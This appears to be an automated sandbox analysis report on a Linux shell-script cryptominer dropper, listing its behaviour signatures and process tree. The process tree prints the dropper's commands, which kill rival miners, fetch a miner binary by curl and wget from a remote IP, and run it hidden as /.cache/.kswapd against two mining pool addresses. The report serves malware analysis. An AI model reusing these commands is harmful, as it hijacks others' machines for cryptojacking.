Analysis
-
max time kernel
127s -
max time network
128s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
27/03/2025, 15:57
Static task
static1
Behavioral task
behavioral1
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
-
Size
5KB
-
MD5
7b72cf30ac42c20f0a14b0b87425c00a
-
SHA1
74402152ac0f0c9dfed6f76975080ce1d0d4584d
-
SHA256
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
-
SHA512
1587b6707b334800f2c4fa7d664542cda84a63c5534b4513003f786058b7d2ef6d22f0f18bdb3d6a81c6a4ea8897453592d4c9bcea0a2e2b62a47f325dbff5eb
-
SSDEEP
96:Dy0G/8yXwI7gzNnwNnP7fbunnbunJKDnWDnbJtgTGQFE/WztGz:Dw5XwKgRaTzUbUesdtgTGQFE/G8
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 782 chmod 921 chmod 994 chmod 1105 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /.cache/.kswapd 923 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh /.cache/.kswapd 1106 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh -
Attempts to change immutable files 36 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 831 grep 835 grep 859 grep 863 grep 867 grep 1058 grep 1038 grep 1066 grep 1054 grep 1082 grep 1086 grep 781 chattr 902 grep 1090 grep 855 grep 879 grep 883 grep 887 grep 1050 grep 1078 grep 843 grep 851 grep 871 grep 1042 grep 823 grep 827 grep 839 grep 847 grep 875 grep 1034 grep 1046 grep 1062 grep 891 grep 993 chattr 1070 grep 1074 grep -
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 1 IoCs
description ioc Process File opened for modification /usr/local/bin/.PvYhX 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh -
Reads CPU attributes 1 TTPs 6 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps -
Process Discovery 1 TTPs 6 IoCs
Adversaries may try to discover information about running processes.
pid Process 784 ps 803 ps 996 ps 1014 ps 761 ps 770 ps -
description ioc Process File opened for reading /proc/stat ps File opened for reading /proc/379/status ps File opened for reading /proc/1024/status ps File opened for reading /proc/173/status ps File opened for reading /proc/672/cmdline ps File opened for reading /proc/379/stat ps File opened for reading /proc/995/cmdline ps File opened for reading /proc/14/status ps File opened for reading /proc/76/cmdline ps File opened for reading /proc/665/stat ps File opened for reading /proc/1/status ps File opened for reading /proc/37/cmdline ps File opened for reading /proc/383/stat ps File opened for reading /proc/707/status ps File opened for reading /proc/4/status ps File opened for reading /proc/9/cmdline ps File opened for reading /proc/22/status ps File opened for reading /proc/13/status ps File opened for reading /proc/707/cmdline ps File opened for reading /proc/77/cmdline ps File opened for reading /proc/319/status ps File opened for reading /proc/688/cmdline ps File opened for reading /proc/713/cmdline ps File opened for reading /proc/6/stat ps File opened for reading /proc/17/stat ps File opened for reading /proc/tty/drivers ps File opened for reading /proc/668/cmdline ps File opened for reading /proc/717/cmdline ps File opened for reading /proc/1007/cmdline ps File opened for reading /proc/36/stat ps File opened for reading /proc/319/status ps File opened for reading /proc/1030/status ps File opened for reading /proc/16/status ps File opened for reading /proc/self/stat ps File opened for reading /proc/4/stat ps File opened for reading /proc/72/stat ps File opened for reading /proc/75/status ps File opened for reading /proc/707/cmdline ps File opened for reading /proc/1021/status ps File opened for reading /proc/4/stat ps File opened for reading /proc/323/status ps File opened for reading /proc/stat ps File opened for reading /proc/707/status ps File opened for reading /proc/78/stat ps File opened for reading /proc/77/cmdline ps File opened for reading /proc/808/cmdline ps File opened for reading /proc/777/status ps File opened for reading /proc/777/status ps File opened for reading /proc/672/cmdline ps File opened for reading /proc/763/cmdline ps File opened for reading /proc/807/cmdline ps File opened for reading /proc/8/cmdline ps File opened for reading /proc/75/cmdline ps File opened for reading /proc/1022/stat ps File opened for reading /proc/78/cmdline ps File opened for reading /proc/7/cmdline ps File opened for reading /proc/5/status ps File opened for reading /proc/74/cmdline ps File opened for reading /proc/702/status ps File opened for reading /proc/20/cmdline ps File opened for reading /proc/383/status ps File opened for reading /proc/10/cmdline ps File opened for reading /proc/4/cmdline ps File opened for reading /proc/1023/stat ps -
Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
description ioc Process File opened for modification /dev/shm/.PvYhX 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/.PvYhX 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Processes
-
/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh1⤵
- Executes dropped EXE
- Write file to user bin folder
- Writes file to shm directory
- Writes file to tmp directory
PID:712 -
/bin/unameuname -a2⤵PID:716
-
-
/bin/rmrm --help2⤵PID:722
-
-
/usr/bin/wcwc -l2⤵PID:725
-
-
/bin/grepgrep " rm does not remove dir"2⤵PID:724
-
-
/bin/grepgrep -i "Dump libcurl equivalent"2⤵PID:730
-
-
/usr/bin/wcwc -l2⤵PID:731
-
-
/usr/bin/curlcurl --help2⤵PID:729
-
-
/bin/grepgrep -i "wgetrc "2⤵PID:740
-
-
/usr/bin/wcwc -l2⤵PID:741
-
-
/usr/bin/wgetwget --version2⤵PID:739
-
-
/usr/bin/trtr -dc A-Za-z0-92⤵PID:745
-
-
/usr/bin/headhead /dev/urandom2⤵PID:744
-
-
/usr/bin/shufshuf -i 4-16 -n 12⤵PID:748
-
-
/usr/bin/headhead -c 52⤵PID:746
-
-
/bin/rmrm -f /tmp/.PvYhX2⤵PID:753
-
-
/bin/rmrm -f /tmp/.PvYhX2⤵PID:755
-
-
/bin/rmrm -f /usr/local/bin/.PvYhX2⤵PID:756
-
-
/bin/rmrm -f /dev/shm/.PvYhX2⤵PID:757
-
-
/bin/rmrm -f /.PvYhX2⤵PID:758
-
-
/bin/grepgrep -v defunct2⤵PID:763
-
-
/bin/grepgrep -v grep2⤵PID:762
-
-
/bin/grepgrep -v "sh "2⤵PID:764
-
-
/bin/grepgrep " sleep 120"2⤵PID:765
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:761
-
-
/usr/bin/wcwc -l2⤵PID:766
-
-
/bin/grepgrep -v grep2⤵PID:771
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:770
-
-
/bin/grepgrep -v "sh "2⤵PID:772
-
-
/bin/grepgrep -v defunct2⤵PID:773
-
-
/bin/grepgrep " sleep 120"2⤵PID:774
-
-
/usr/bin/wcwc -l2⤵PID:775
-
-
/bin/sleepsleep 1202⤵PID:779
-
-
/bin/mkdirmkdir -p /.cache/2⤵PID:780
-
-
/usr/bin/chattrchattr -i /.cache/2⤵
- Attempts to change immutable files
PID:781
-
-
/bin/chmodchmod 1755 /.cache/2⤵
- File and Directory Permissions Modification
PID:782
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:784
-
-
/bin/grepgrep -v l02⤵PID:785
-
-
/bin/grepgrep -v eth12⤵PID:786
-
-
/bin/grepgrep -v lan02⤵PID:787
-
-
/bin/grepgrep -v "^-"2⤵PID:788
-
-
/bin/grepgrep -v eth02⤵PID:789
-
-
/bin/grepgrep -v inet02⤵PID:790
-
-
/bin/grepgrep -v lano2⤵PID:792
-
-
/bin/grepgrep -v grep2⤵PID:793
-
-
/bin/grepgrep -v defunct2⤵PID:794
-
-
/bin/grepgrep -v knthread2⤵PID:795
-
-
/bin/grepgrep -vi aaaaaaaaaa2⤵PID:796
-
-
/bin/grepgrep -vi "java "2⤵PID:797
-
-
/bin/grepgrep -vi jenkins2⤵PID:798
-
-
/bin/grepgrep -vi exim2⤵PID:799
-
-
/usr/bin/headhead -n 12⤵PID:801
-
-
/usr/bin/awkawk "{if(\$3>=54.0) print \$11}"2⤵PID:800
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:803
-
-
/bin/grepgrep -v eth12⤵PID:805
-
-
/bin/grepgrep -v lan02⤵PID:806
-
-
/bin/grepgrep -v l02⤵PID:804
-
-
/bin/grepgrep -v "^-"2⤵PID:807
-
-
/bin/grepgrep -v eth02⤵PID:808
-
-
/bin/grepgrep -v inet02⤵PID:809
-
-
/bin/grepgrep -v lano2⤵PID:810
-
-
/bin/grepgrep -v grep2⤵PID:811
-
-
/bin/grepgrep -v defunct2⤵PID:812
-
-
/bin/grepgrep -v python2⤵PID:813
-
-
/bin/grepgrep -v knthread2⤵PID:814
-
-
/bin/grepgrep -vi aaaaaaaaaa2⤵PID:815
-
-
/bin/grepgrep -vi exim2⤵PID:817
-
-
/usr/bin/awkawk "{if(\$3>=0.0) print \$2}"2⤵PID:818
-
-
/bin/grepgrep -vi bash2⤵PID:816
-
-
/usr/bin/uniquniq2⤵PID:819
-
-
/bin/readlinkreadlink /proc/319/exe2⤵PID:821
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/319/exe2⤵
- Attempts to change immutable files
PID:823
-
-
/bin/readlinkreadlink /proc/320/exe2⤵PID:825
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/320/exe2⤵
- Attempts to change immutable files
PID:827
-
-
/bin/readlinkreadlink /proc/323/exe2⤵PID:829
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/323/exe2⤵
- Attempts to change immutable files
PID:831
-
-
/bin/readlinkreadlink /proc/325/exe2⤵PID:833
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/325/exe2⤵
- Attempts to change immutable files
PID:835
-
-
/bin/readlinkreadlink /proc/326/exe2⤵PID:837
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/326/exe2⤵
- Attempts to change immutable files
PID:839
-
-
/bin/readlinkreadlink /proc/378/exe2⤵PID:841
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/378/exe2⤵
- Attempts to change immutable files
PID:843
-
-
/bin/readlinkreadlink /proc/379/exe2⤵PID:845
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/379/exe2⤵
- Attempts to change immutable files
PID:847
-
-
/bin/readlinkreadlink /proc/383/exe2⤵PID:849
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/383/exe2⤵
- Attempts to change immutable files
PID:851
-
-
/bin/readlinkreadlink /proc/427/exe2⤵PID:853
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/427/exe2⤵
- Attempts to change immutable files
PID:855
-
-
/bin/readlinkreadlink /proc/665/exe2⤵PID:857
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/665/exe2⤵
- Attempts to change immutable files
PID:859
-
-
/bin/readlinkreadlink /proc/668/exe2⤵PID:861
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/668/exe2⤵
- Attempts to change immutable files
PID:863
-
-
/bin/readlinkreadlink /proc/702/exe2⤵PID:865
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/702/exe2⤵
- Attempts to change immutable files
PID:867
-
-
/bin/readlinkreadlink /proc/703/exe2⤵PID:869
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/703/exe2⤵
- Attempts to change immutable files
PID:871
-
-
/bin/readlinkreadlink /proc/707/cwd2⤵PID:872
-
-
/bin/catcat /proc/707/comm2⤵PID:873
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //kdumpy2⤵
- Attempts to change immutable files
PID:875
-
-
/bin/readlinkreadlink /proc/709/cwd2⤵PID:876
-
-
/bin/catcat /proc/709/comm2⤵PID:877
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump2⤵
- Attempts to change immutable files
PID:879
-
-
/bin/readlinkreadlink /proc/710/cwd2⤵PID:880
-
-
/bin/catcat /proc/710/comm2⤵PID:881
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma2⤵
- Attempts to change immutable files
PID:883
-
-
/bin/readlinkreadlink /proc/713/exe2⤵PID:885
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/713/exe2⤵
- Attempts to change immutable files
PID:887
-
-
/bin/readlinkreadlink /proc/717/exe2⤵PID:889
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/717/exe2⤵
- Attempts to change immutable files
PID:891
-
-
/bin/rmrm -rf /usr/sbin/agent2⤵PID:896
-
-
/bin/readlinkreadlink /proc/779/exe2⤵PID:899
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/779/exe2⤵
- Attempts to change immutable files
PID:902
-
-
/bin/grepgrep x86_642⤵PID:905
-
-
/usr/bin/wcwc -l2⤵PID:906
-
-
/usr/bin/curlcurl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd2⤵PID:910
-
-
/usr/bin/wgetwget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd2⤵PID:918
-
-
/bin/chmodchmod +x /.cache/.kswapd2⤵
- File and Directory Permissions Modification
PID:921
-
-
/bin/sleepsleep 1202⤵PID:991
-
-
/bin/mkdirmkdir -p /.cache/2⤵PID:992
-
-
/usr/bin/chattrchattr -i /.cache/2⤵
- Attempts to change immutable files
PID:993
-
-
/bin/chmodchmod 1755 /.cache/2⤵
- File and Directory Permissions Modification
PID:994
-
-
/bin/grepgrep -v l02⤵PID:997
-
-
/bin/grepgrep -v eth12⤵PID:998
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:996
-
-
/bin/grepgrep -v lan02⤵PID:999
-
-
/bin/grepgrep -v "^-"2⤵PID:1000
-
-
/bin/grepgrep -v eth02⤵PID:1001
-
-
/bin/grepgrep -v inet02⤵PID:1002
-
-
/bin/grepgrep -v lano2⤵PID:1003
-
-
/bin/grepgrep -v grep2⤵PID:1004
-
-
/bin/grepgrep -v defunct2⤵PID:1005
-
-
/bin/grepgrep -v knthread2⤵PID:1006
-
-
/bin/grepgrep -vi aaaaaaaaaa2⤵PID:1007
-
-
/bin/grepgrep -vi "java "2⤵PID:1008
-
-
/bin/grepgrep -vi jenkins2⤵PID:1009
-
-
/bin/grepgrep -vi exim2⤵PID:1010
-
-
/usr/bin/awkawk "{if(\$3>=54.0) print \$11}"2⤵PID:1011
-
-
/usr/bin/headhead -n 12⤵PID:1012
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1014
-
-
/bin/grepgrep -v l02⤵PID:1015
-
-
/bin/grepgrep -v eth12⤵PID:1016
-
-
/bin/grepgrep -v lan02⤵PID:1017
-
-
/bin/grepgrep -v "^-"2⤵PID:1018
-
-
/bin/grepgrep -v eth02⤵PID:1019
-
-
/bin/grepgrep -v inet02⤵PID:1020
-
-
/bin/grepgrep -v lano2⤵PID:1021
-
-
/bin/grepgrep -v grep2⤵PID:1022
-
-
/bin/grepgrep -v defunct2⤵PID:1023
-
-
/bin/grepgrep -v python2⤵PID:1024
-
-
/bin/grepgrep -v knthread2⤵PID:1025
-
-
/bin/grepgrep -vi aaaaaaaaaa2⤵PID:1026
-
-
/bin/grepgrep -vi bash2⤵PID:1027
-
-
/bin/grepgrep -vi exim2⤵PID:1028
-
-
/usr/bin/awkawk "{if(\$3>=0.0) print \$2}"2⤵PID:1029
-
-
/usr/bin/uniquniq2⤵PID:1030
-
-
/bin/readlinkreadlink /proc/319/exe2⤵PID:1032
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/319/exe2⤵
- Attempts to change immutable files
PID:1034
-
-
/bin/readlinkreadlink /proc/320/exe2⤵PID:1036
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/320/exe2⤵
- Attempts to change immutable files
PID:1038
-
-
/bin/readlinkreadlink /proc/323/exe2⤵PID:1040
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/323/exe2⤵
- Attempts to change immutable files
PID:1042
-
-
/bin/readlinkreadlink /proc/325/exe2⤵PID:1044
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/325/exe2⤵
- Attempts to change immutable files
PID:1046
-
-
/bin/readlinkreadlink /proc/326/exe2⤵PID:1048
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/326/exe2⤵
- Attempts to change immutable files
PID:1050
-
-
/bin/readlinkreadlink /proc/378/exe2⤵PID:1052
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/378/exe2⤵
- Attempts to change immutable files
PID:1054
-
-
/bin/readlinkreadlink /proc/379/exe2⤵PID:1056
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/379/exe2⤵
- Attempts to change immutable files
PID:1058
-
-
/bin/readlinkreadlink /proc/383/exe2⤵PID:1060
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/383/exe2⤵
- Attempts to change immutable files
PID:1062
-
-
/bin/readlinkreadlink /proc/427/exe2⤵PID:1064
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/427/exe2⤵
- Attempts to change immutable files
PID:1066
-
-
/bin/readlinkreadlink /proc/665/exe2⤵PID:1068
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/665/exe2⤵
- Attempts to change immutable files
PID:1070
-
-
/bin/readlinkreadlink /proc/668/exe2⤵PID:1072
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/668/exe2⤵
- Attempts to change immutable files
PID:1074
-
-
/bin/readlinkreadlink /proc/707/cwd2⤵PID:1075
-
-
/bin/catcat /proc/707/comm2⤵PID:1076
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //kdumpy2⤵
- Attempts to change immutable files
PID:1078
-
-
/bin/readlinkreadlink /proc/709/cwd2⤵PID:1079
-
-
/bin/catcat /proc/709/comm2⤵PID:1080
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump2⤵
- Attempts to change immutable files
PID:1082
-
-
/bin/readlinkreadlink /proc/710/cwd2⤵PID:1083
-
-
/bin/catcat /proc/710/comm2⤵PID:1084
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma2⤵
- Attempts to change immutable files
PID:1086
-
-
/bin/readlinkreadlink /proc/991/exe2⤵PID:1088
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/991/exe2⤵
- Attempts to change immutable files
PID:1090
-
-
/usr/bin/md5summd5sum /.cache/.kswapd2⤵PID:1093
-
-
/usr/bin/cutcut -c 1-322⤵PID:1094
-
-
/usr/bin/cutcut -c 1-322⤵PID:1097
-
-
/usr/bin/md5summd5sum /.cache/.kswapd2⤵PID:1096
-
-
/bin/grepgrep x86_642⤵PID:1100
-
-
/usr/bin/wcwc -l2⤵PID:1101
-
-
/usr/bin/curlcurl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd2⤵PID:1103
-
-
/usr/bin/wgetwget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd2⤵PID:1104
-
-
/bin/chmodchmod +x /.cache/.kswapd2⤵
- File and Directory Permissions Modification
PID:1105
-
-
/.cache/.kswapd/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B1⤵PID:923
-
/.cache/.kswapd/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B1⤵PID:1106
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6B
MD5350651a199bf4298f90c64f8bd5b3685
SHA1f9096291ba57481c791b44003dd333716189b0ae
SHA256d4ca13aa541fc8c0b9982ff27edaa21e7e2759910842ca401567efd5b1a2165a
SHA5123ea0399b30e9d898c957002c582a451c6f09d3e2b61150ca245a33d5140300c0cf926bc7b3f98c9030d728f6b723d66fbbb363c83c4e571ef37196617ef9da99